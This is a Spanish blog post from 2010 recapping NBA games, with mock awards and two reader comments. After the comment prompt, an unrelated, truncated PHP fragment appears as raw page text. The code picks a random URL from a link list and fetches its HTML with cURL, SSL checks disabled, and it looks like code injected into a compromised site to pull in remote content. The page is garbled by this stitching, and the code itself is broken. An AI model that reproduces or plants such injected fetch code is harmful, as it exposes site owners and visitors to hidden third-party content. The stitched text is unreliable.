La Crónica (01/02/2010)

02 de February de 2010 por txusma

Curioso que ayer nombráramos a Rudy Gay, jugador de cierta fama ególatra y caprichosa, y que anoche precísamente se marcara su mejor partido desde que se hiciera pública la lista completa de participantes en el all-star game. No se lo puso nada fácil Ron Artest, quien tuvo en sus manos la llave de la victoria. No es fácil hacer de Kobe, aún disfrutando de un tiro abierto, desmarcado, imaginado por el 24 resolviendo así acertadamente la sobremarca descarada que le hacían. Hubiera podido ser un partido de esos que dicen le encantan a la Mamba, el partido perfecto donde nada brilla más que él ni aún delegando la jugada decisiva en otro. La fecha mítica que hubiera sido superando a West como máximo anotador amarillo de todos los tiempos (y se dice pronto) la estropeó el gran trabajo de Zach y Marc sobre Bynum y Pau y la afición que tienen los Lakers a complicarse siempre la vida. Anoche no hacía falta mucho empeño en un FedEx Forum donde este curso hace falta sudar para salir de allí vivo.

Por su parte los Celtics no tuvieron problemas para ganar en Washington. Tras rasgarse todas sus vestiduras y quemar todos sus iconos, el día después todo queda en tablas frente a sus máximos rivales. El regusto de una tan dolorosa derrota, aunque signifique exactamente nada, sin embargo, queda.

Los Heat le ven las orejas al lobo. Un lobo con forma de alce de colores verde y rojo. Es difícil encontrar un equipo peor gestionado que Miami. El año pasado se disimulaban las vergüenzas con un Wade super-humano. Este año, con Flash un pequeño peldaño por debajo de sí mismo están tremendamente próximos a perder su eventual plaza de playoffs. Los Bucks juegan bastante mejor a esto.

Espectacular duelo Nowitzki-Millsap que vivimos en el “lago de la sal”. Los Jazz, sin Boozer, mostraron más armas que Dallas y les acechan en la clasificación provisional del Oeste. Los Nuggets sufrieron mucho para ganar a unos Kings que juegan tanto mejor cuanto menos coincidan Martin y Tyreke. Sergio volvió a hacerlo bien en los fugaces momentos que disfrutó. Su situación es una lástima, pero podemos entender que Tyreke y Udrih (jugando razonablemente bien) están por delante de él. Un modo de actuar respetable y siempre coherente de Westphal. Nada que ver con la situación que sufrió en Portland.

Los Suns jugaron un partido muy inteligente en New Orleans, logrando sacar el suficiente partido a la baja de Chris Paul a pesar de que los Hornets nunca dieron su brazo a torcer. Convincente victoria de los Blazers contra Charlotte, mostrando su mejor cara colectiva y el excelente fondo de armario que siempre han tenido (y pocas veces muestran). Con estos resultados la cola de playoffs del Oeste todavía se estrecha más, si cabe.

PREMIOS

MVP: Milwaukee se resiste a perder la senda de los Playoffs y anoche de la mano de Andrew Bogut (22 puntos, 11 rebotes, 10 de 13 en tiro) consiguieron una importantísima victoria ante los Heat. Mientras hay vida, hay esperanza.

Rookie: Marcus Thorton ya hace días que aparece con regularidad por esta sección pero ahora, ante la baja de Chris Paul, ya podemos irnos acostumbrando a su compañero Darren Collison. El primero anotó anoche 25 puntos y el segundo se fue a los 16 y 14 asistencias. ¡Vaya parejita que han encontrado los Hornets!

Sorpresa: Desde que Robin Lopez es titular y disfruta de minutos sus números han crecido como la espuma. Promedia 13 puntos y 6 rebotes con un 70% de acierto en el tiro. En el partido de ayer anotó 8 de sus 10 intentos y se fue a los 18 puntos.

Decepción: Siempre le alabamos pero si Antawn Jamison nos ofrece un partido tan horrendo como el que jugó anoche, es de justicia destacarlo. 8 puntos, anotando solamente 2 canastas de 17 intentos.

Mayor esfuerzo en vano: Como ya se ha comentado, los 44 puntos que consiguió anoche Kobe Bryant le permitieron sobrepasar a Jerry West como el máximo anotador de la historia de los Lakers. Desgraciadamente, quedará para la posteridad que aquel día los amarillos no ganaron el partido.

Comenta

2 comentarios a esta entrada

  1. Kajie dice:
    #1

    Es raro lo de los Celtics, lo achacabamos a la baja de Garnett o Pierce pero ahora están todos y no terminan de arrancar. A ver si despues del all star vuelven a generar juego. Lo que no se puede hacer es echarle la bronca a Allen por lo del domingo, porque él no tuvo ninguna culpa, es más, hizo una defensa muy buena contra Kobe (que además de ser un jugador increíble también tiene mucha suerte) y luego falló el triple decisivo, pero cuántos triples decisivos nos ha dado a lo largo de estos 3 años?
    Yo creo que es un problema de equipo, hace 3 meses hubiéramos ganado a los lakers facilmente.

    Y creeme, para mí si que significa mucho la derrota contra Lakers, es como ver que aunque llegáramos a la final (cosa difícil ahora mismo) lo tendríamos realmente negro.

      Citar

  2. Love Denise dice:
    #2

    no vi el partido, pero viendo el boxscore y los resumenes, no entiendo por qué los hermanos Gasol tiraron tan poco a canasta, en los Lakers entre Pau, Artest, Odom y Bynum tiraron los mismos tiros que Bryant. Pensaba que este iba a ser el primer año en que se notase los años de Kobe y su rendimiento empezara a decaer cuesta abajo, pero me equivoque bastante, para mí, está haciendo la mejor temporada de su carrera, incluso mucho mejor que la anterior en que fue MVP.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>